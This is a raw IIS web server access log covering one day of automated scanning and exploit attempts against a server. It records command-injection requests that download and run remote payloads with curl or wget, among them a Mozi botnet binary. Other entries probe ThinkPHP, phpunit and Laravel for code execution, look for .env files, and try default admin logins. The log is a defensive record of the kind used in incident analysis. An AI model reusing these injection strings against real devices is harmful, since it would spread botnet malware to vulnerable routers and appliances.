#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 00:23:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 00:23:32 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 437 2021-04-09 00:25:09 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 200 0 0 265 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 01:03:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 01:03:21 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 426 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 01:28:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 01:28:32 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 01:59:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 01:59:23 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 437 2021-04-09 02:10:04 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 03:51:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 03:51:49 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 64 16656 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 05:05:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 05:05:25 192.168.0.14 GET /portal/redlion - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 468 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 06:42:50 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 06:42:50 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 437 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 07:55:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 07:55:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 515 2021-04-09 08:03:53 192.168.0.14 HEAD / - 80 - 192.168.0.95 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2021-04-09 08:07:17 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 09:04:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 09:04:10 192.168.0.14 GET /actuator/health - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 437 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 10:16:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 10:16:11 192.168.0.14 GET /hudson - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 469 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 10:58:57 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 10:58:57 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 531 2021-04-09 10:58:57 192.168.0.14 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 250 2021-04-09 10:58:58 192.168.0.14 GET /login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 250 2021-04-09 10:58:58 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 250 2021-04-09 10:58:58 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 250 2021-04-09 10:58:59 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 250 2021-04-09 10:58:59 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 281 2021-04-09 10:59:00 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 11:35:14 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 11:35:14 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1) http://14.139.109.23:80 200 0 0 796 2021-04-09 11:49:51 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 1236 15304 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 12:52:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 12:52:59 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.213.46.235:52353/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 13:39:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 13:39:09 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla+5/0 - 404 0 2 515 2021-04-09 13:39:10 192.168.0.14 GET /vendor/phpunit/phpunit/phpunit.xml - 80 - 192.168.0.1 Mozilla+5/0 - 404 0 2 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 14:15:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 14:15:31 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 390 2021-04-09 14:17:55 192.168.0.14 GET / - 80 - 192.168.0.1 Linux+Gnu+(cow) - 200 0 0 296 2021-04-09 14:28:43 192.168.0.14 GET /boaform/admin/formLogin username=admin&psd=admin 80 - 192.168.0.1 - - 404 0 2 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 14:52:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 14:52:08 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 15:25:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 15:25:01 192.168.0.14 GET /phpmyadmin/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 203 2021-04-09 15:25:01 192.168.0.14 GET /pmd/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 15:43:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 15:43:49 192.168.0.14 GET /phpmyadmin/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 109 2021-04-09 15:43:49 192.168.0.14 GET /pmd/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 17:00:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 17:00:01 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 200 0 0 437 2021-04-09 17:12:45 192.168.0.14 GET /manager/text/list - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 250 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 17:29:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 17:29:21 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 250 2021-04-09 17:29:21 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 268 2021-04-09 17:29:24 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 - 404 0 2 265 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 18:12:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 18:12:51 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 437 2021-04-09 18:12:56 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 19:09:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 19:09:20 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 471 2021-04-09 19:12:42 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 62 2021-04-09 19:24:39 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-09 23:45:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-09 23:45:55 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 265 2021-04-09 23:45:55 192.168.0.14 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 80 - 192.168.0.1 - - 404 0 2 437